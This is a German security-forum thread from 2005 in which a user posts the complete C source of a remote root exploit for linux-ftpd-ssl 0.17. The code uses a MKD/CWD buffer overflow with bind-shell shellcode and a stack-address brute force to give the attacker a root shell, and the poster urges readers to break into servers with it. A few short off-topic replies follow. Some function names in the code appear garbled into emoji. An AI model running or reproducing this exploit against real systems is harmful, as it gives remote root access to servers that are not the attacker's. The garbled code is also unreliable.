linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von moep_rush, 6. November 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 6. November 2005
    und jetzt roxx0rt die boxX0rz mit ano login !

    Code:
    #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define BUF_SIZ 4096
#define PORT 21
#define BINDPORT 30464
#define STACK_START 0xbfffcc03
#define STACK_END 0xbffff4f0

/*my shellcode*/
/*setreuid,chroot break,
bind to port 30464, 0xff is double*/
unsigned char lnx_bind[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x70\x31\xC0\x31\xDB\x31\xC9"
"\xB0\x46\xCD\x80\x5E\x90\xB8\xBE"
"\xff\xff\xff\xff\xff\xff\xF7\xD0"
"\x89\x06\xB0\x27\x8D\x1E\xFE\xC5"
"\xB1\xED\xCD\x80\x31\xC0\x8D\x1E"
"\xB0\x3D\xCD\x80\x66\xB9\xff\xff"
"\x03\xBB\xD2\xD1\xD0\xff\xff\xF7"
"\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD"
"\x80\xE2\xEF\xB8\xD1\xff\xff\xff"
"\xff\xff\xff\xF7\xD0\x89\x06\xB0"
"\x3D\x8D\x1E\xCD\x80\x31\xC0\x31"
"\xDB\x89\xF1\xB0\x02\x89\x06\xB0"
"\x01\x89\x46\x04\xB0\x06\x89\x46"
"\x08\xB0\x66\x43\xCD\x80\x89\xF1"
"\x89\x06\xB0\x02\x66\x89\x46\x0C"
"\xEB\x04\xEB\x74\xEB\x77\xB0\x77"
"\x66\x89\x46\x0E\x8D\x46\x0C\x89"
"\x46\x04\x31\xC0\x89\x46\x10\xB0"
"\x10\x89\x46\x08\xB0\x66\x43\xCD"
"\x80\xB0\x01\x89\x46\x04\xB0\x66"
"\xB3\x04\xCD\x80\x31\xC0\x89\x46"
"\x04\x89\x46\x08\xB0\x66\xB3\x05"
"\xCD\x80\x88\xC3\xB0\x3F\x31\xC9"
"\xCD\x80\xB0\x3F\xB1\x01\xCD\x80"
"\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0"
"\x9D\x96\x91\xF7\xD0\x89\x06\xB8"
"\xD0\x8C\x97\xD0\xF7\xD0\x89\x46"
"\x04\x31\xC0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0C\xB0\x0B\x89\xF3"
"\x8D\x4E\x08\x8D\x56\x0C\xCD\x80"
"\xE8\x15\xff\xff\xff\xff\xff\xff";

long ♂️♀️n() {
 printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\n\n");
 return 0xc0debabe;
}

void usage(char **argv) {
 printf("Insufficient parameters given.\n");
 printf("Usage: %s <remotehost> <user> <pass> [writeable directory]\n", argv[0]);
 exit(0);
}

void _recv(int sock, char *buf) {
 int bytes=recv(sock, buf, BUFSIZ, 0);
 if (bytes < 0) {
 perror("read() failed");
 exit(1);
 }
}

void attack(int sock, unsigned long ret, char *pad) {
 int i,k;
 char *x=(char*)malloc(1024);
 char *bufm=(char*)malloc(1024);
 char *bufc=(char*)malloc(1024);
 char *rbuf=(char*)malloc(BUFSIZ+10);
 char *nops=(char*)malloc(1024);
 unsigned char a,b,c,d;

 memset(nops,0,1024);
 memset(nops,0x90,255);
 memset(x,0,1024);
 for (i=0,k=0;i<60;i++) {
 a=(ret >> 24) & 0xff;
 b=(ret >> 16) & 0xff;
 c=(ret >> 8) & 0xff;
 d=(ret) & 0xff;

 if (d==255) {
 x[k]=d;
 x[++k]=255;
 } else {
 x[k]=d;
 }

 if (c==255) {
 x[k+1]=c;
 x[++k+1]=255;
 } else {
 x[k+1]=c;
 }

 if (b==255) {
 x[k+2]=b;
 x[++k+2]=255;
 } else {
 x[k+2]=b;
 }

 if (a==255) {
 x[k+3]=a;
 x[++k+3]=255;
 } else {
 x[k+3]=a;
 }

 k+=4;
 }

 snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1
 snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x);
 for (i=0; i<11; i++) {
 send(sock, bufm, strlen(bufm), 0);
 recv(sock, rbuf, BUFSIZ, 0);
 send(sock, bufc, strlen(bufc), 0);
 recv(sock, rbuf, BUFSIZ, 0);
 }

 for (i=0; i<2; i++) {
 snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind);
 snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind);
 send(sock, bufm, strlen(bufm), 0);
 recv(sock, rbuf, BUFSIZ, 0);
 send(sock, bufc, strlen(bufc), 0);
 recv(sock, rbuf, BUFSIZ, 0);

 snprintf(bufm, 1000, "MKD %s\r\n", nops);
 snprintf(bufc, 1000, "CWD %s\r\n", nops);
 send(sock, bufm, strlen(bufm), 0);
 recv(sock, rbuf, BUFSIZ, 0);
 send(sock, bufc, strlen(bufc), 0);
 recv(sock, rbuf, BUFSIZ, 0);
 }

 send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0);

 free(bufm);
 free(bufc);
 free(x);
 free(rbuf);
}

int do_remote_shell(int sockfd)
{
 while(1)
 {
 fd_set fds;
 FD_ZERO(&fds);
 FD_SET(0,&fds);
 FD_SET(sockfd,&fds);
 if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
 {
 int cnt;
 char buf[1024];
 if(FD_ISSET(0,&fds))
 {
 if((cnt=read(0,buf,1024))<1)
 {
 if(errno==EWOULDBLOCK||errno==EAGAIN)
 continue;
 else
 break;
 }
 write(sockfd,buf,cnt);
 }
 if(FD_ISSET(sockfd,&fds))
 {
 if((cnt=read(sockfd,buf,1024))<1)
 {
 if(errno==EWOULDBLOCK||errno==EAGAIN)
 continue;
 else
 break;
 }
 write(1,buf,cnt);
 }
 }
 }
}

int do_connect (char *remotehost, int port) {
 struct hostent *host;
 struct sockaddr_in addr;
 int s;

 if (!inet_aton(remotehost, &addr.sin_addr))
 {
 host = gethostbyname(remotehost);
 if (!host)
 {
 perror("gethostbyname() failed");
 return -1;
 }
 addr.sin_addr = *(struct in_addr*)host->h_addr;
 }

 s = socket(PF_INET, SOCK_STREAM, 0);
 if (s == -1)
 {
 perror("socket() failed");
 return -1;
 }

 addr.sin_port = htons(port);
 addr.sin_family = AF_INET;

 if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
 {
 if (port == PORT) perror("connect() failed");
 return -1;
 }

 return s;
}

void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {
 memset(buf, 0, sizeof(buf));
 memset(sendbuf, 0, sizeof(sendbuf));
 do {
 _recv(s, buf);
 } while (strstr(buf, "220 ") == NULL);
 snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user);
 send(s, sendbuf, strlen(sendbuf), 0);
 do {
 _recv(s, buf);
 } while (strstr(buf, "331 ") == NULL);

 snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass);
 send(s, sendbuf, strlen(sendbuf), 0);
 do {
 _recv(s, buf);
 } while (strstr(buf, "230 ") == NULL);
}

int main(int argc, char **argv) {
 char remotehost[255];
 char user[255];
 char pass[255];
 char pad[10];
 char *buf,*sendbuf;
 int stackaddr=STACK_START;
 int s,sr00t,i;

 ♂️♀️n();
 if (argc < 4)
 usage(argv);

 strncpy(remotehost, argv[1], sizeof(remotehost));
 remotehost[sizeof(remotehost)-1]=0;
 strncpy(user, argv[2], sizeof(user));
 user[sizeof(user)-1]=0;
 strncpy(pass, argv[3], sizeof(pass));
 pass[sizeof(pass)-1]=0;

 printf("connecting to %s:%d...", remotehost, PORT);
 fflush(stdout);

 s=do_connect(remotehost, PORT);

 puts(" ok.");
 buf=(char*)malloc(BUFSIZ+10);
 sendbuf=(char*)malloc(BUFSIZ+10);
 do_login(s, buf, sendbuf, user, pass);

 if (strstr(buf, "230")!=NULL) {
 printf("OK - STARTING ATTACK\n");
 i=0;
 while (stackaddr <= STACK_END) {
 printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr);

 sleep(1);

 if (i==1) {
 strcpy(pad, "A");
 }

 if (i==2) {
 strcpy(pad, "AA");
 }

 if (i==3) {
 strcpy(pad, "AAA");
 i=0;
 }

 attack(s, stackaddr, pad);
 close(s);
 s=do_connect(remotehost, PORT);
 do_login(s, buf, sendbuf, user, pass);

 if (argv[4] != NULL) {
 snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]);
 send(s, sendbuf, strlen(sendbuf), 0);
 recv(s, buf, BUFSIZ, 0);
 }

 if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {
 /* XXX Remote r00t */
 printf("\nLet's get ready to rumble!\n");
 do_remote_shell(sr00t);
 exit(0);
 }

 stackaddr+=16;
 i++;
 }
 } else {
 printf("\nLogin incorrect\n");
 exit(1);
 }

 free(buf);
 free(sendbuf);
 return 0;
}
     
  3. 6. November 2005
    ajo du hast nen syntax fehler in deiner signatur, rate mal wo
     
  4. 6. November 2005
    der verdammte ":"


    edit :// fixed
     
  5. 22. November 2005
    Wie alt ist denn das Exploit?
     
  6. 22. November 2005
    Die Version ist vom Oct 2005.
     
  7. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.